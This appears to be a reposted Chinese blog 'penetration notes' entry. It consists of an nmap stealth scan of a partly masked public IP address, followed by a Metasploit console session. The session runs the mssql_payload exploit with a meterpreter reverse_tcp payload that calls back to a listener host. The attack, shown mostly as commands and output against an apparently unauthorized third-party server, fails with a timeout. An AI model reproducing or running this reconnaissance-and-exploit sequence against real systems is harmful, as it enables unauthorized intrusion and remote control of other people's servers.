渗透杂记-2013-07-13 windows/mssql/mssql_payload

扫描一下 
Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 
NSE: Loaded 49 scripts for scanning. 
Initiating Ping Scan at 09:36 
Scanning 203.171.239.* [4 ports] 
Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts) 
Initiating Parallel DNS resolution of 1 host. at 09:36 
Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed 
Initiating SYN Stealth Scan at 09:36 
Scanning 203.171.239.* [1000 ports] 
Discovered open port 3389/tcp on 203.171.239.* 
Discovered open port 80/tcp on 203.171.239.* 
Discovered open port 3306/tcp on 203.171.239.* 
Discovered open port 21/tcp on 203.171.239.* 
Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports) 
Initiating Service scan at 09:36 
Scanning 4 services on 203.171.239.* 
Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host) 
Initiating OS detection (try #1) against 203.171.239.* 
Retrying OS detection (try #2) against 203.171.239.* 
Initiating Traceroute at 09:37 
Completed Traceroute at 09:37, 0.06s elapsed 
Initiating Parallel DNS resolution of 1 host. at 09:37 
Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed 
NSE: Script scanning 203.171.239.*. 
NSE: Starting runlevel 1 (of 1) scan. 
Initiating NSE at 09:37 
Completed NSE at 09:37, 5.22s elapsed 
NSE: Script Scanning completed. 
Nmap scan report for 203.171.239.* 
Host is up (0.043s latency). 
Not shown: 994 filtered ports 
PORT STATE SERVICE VERSION 
21/tcp open ftp Microsoft ftpd 
25/tcp closed smtp 
80/tcp open http Microsoft IIS httpd 
|_http-methods: No Allow or Public header in OPTIONS response (status code 400) 
|_html-title: Site doesn't have a title (text/html). 
110/tcp closed pop3 
3306/tcp open mysql MySQL 5.1.32-community 
| mysql-info: Protocol: 10 
| Version: 5.1.32-community 
| Thread ID: 30457 
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection 
| Status: Autocommit 
|_Salt: <*[k+0O~O" target=_blank>B@Y";By^J5k<*[k+0O~O 
3389/tcp open microsoft-rdp Microsoft Terminal Service 
Device type: general purpose|media device 
Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%) 
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%) 
No exact OS matches for host (test conditions non-ideal). 
Network Distance: 1 hop 
TCP Sequence Prediction: Difficulty=262 (Good luck!) 
IP ID Sequence Generation: Busy server or unknown class 
Service Info: OS: Windows 
TRACEROUTE (using port 25/tcp) 
HOP RTT ADDRESS 
1 50.00 ms 203.171.239.* 
Read data files from: D:\metasploit\Nmap 
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds 
Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB) 
开始拿站 
Welcome to the Metasploit Web Console! 
_ _ 
_ | | (_)_ 
____ ____| |_ ____ ___ ____ | | ___ _| |_ 
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) 
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ 
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___) 
|_| 
=[ metasploit v3.4.2-dev [core:3.4 api:1.0] 
+ -- --=[ 566 exploits - 283 auxiliary 
+ -- --=[ 210 payloads - 27 encoders - 8 nops 
=[ svn r9834 updated 296 days ago (2010.07.14) 
Warning: This copy of the Metasploit Framework was last updated 296 days ago. 
We recommend that you update the framework at least every other day. 
For information on updating your copy of Metasploit, please see: 
http://www.metasploit.com/redmine/projects/framework/wiki/Updating 
>> use windows/mssql/mssql_payload 
>> info windows/mssql/mssql_payload 
Name: Microsoft SQL Server Payload Execution 
Version: 9669 
Platform: Windows 
Privileged: No 
License: Metasploit Framework License (BSD) 
Rank: Excellent 
Provided by: 
David Kennedy "ReL1K" <kennedyd013@gmail.com> 
jduck <jduck@metasploit.com> 
Available targets: 
Id Name 
-- ---- 
0 Automatic 
Basic options: 
Name Current Setting Required Description 
---- --------------- -------- ----------- 
PASSWORD no The password for the specified username 
RHOST yes The target address 
RPORT 1433 yes The target port 
USERNAME sa no The username to authenticate as 
UseCmdStager true no Wait for user input before returning from exploit 
VERBOSE false no Enable verbose output 
Payload information: 
Description: 
This module will execute an arbitrary payload on a Microsoft SQL 
Server, using the Windows debug.com method for writing an executable 
to disk and the xp_cmdshell stored procedure. File size restrictions 
are avoided by incorporating the debug bypass method presented at 
Defcon 17 by SecureState. Note that this module will leave a 
metasploit payload in the Windows System32 directory which must be 
manually deleted once the attack is completed. 
References: 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402 
http://www.osvdb.org/557 
http://www.securityfocus.com/bid/1281 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209 
http://www.osvdb.org/15757 
http://www.securityfocus.com/bid/4797 
http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf 
>> use windows/mssql/mssql_payload 
>> set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp 
>> show options 
Module options: 
Name Current Setting Required Description 
---- --------------- -------- ----------- 
PASSWORD no The password for the specified username 
RHOST yes The target address 
RPORT 1433 yes The target port 
USERNAME sa no The username to authenticate as 
UseCmdStager true no Wait for user input before returning from exploit 
VERBOSE false no Enable verbose output 
Payload options (windows/meterpreter/reverse_tcp): 
Name Current Setting Required Description 
---- --------------- -------- ----------- 
EXITFUNC process yes Exit technique: seh, thread, process 
LHOST yes The listen address 
LPORT 4444 yes The listen port 
Exploit target: 
Id Name 
-- ---- 
0 Automatic 
>> set RHOST 203.171.239.* 
RHOST => 203.171.239.* 
>> set LHOST 172.16.2.101 
LHOST => 172.16.2.101 
>> exploit 
[*] Started reverse handler on 172.16.2.101:4444 
[-] Exploit failed: The connection timed out (203.171.239.*:1433). 
[*] Exploit completed, but no session was created.

转载于:https://www.cnblogs.com/hackwang/p/6228732.html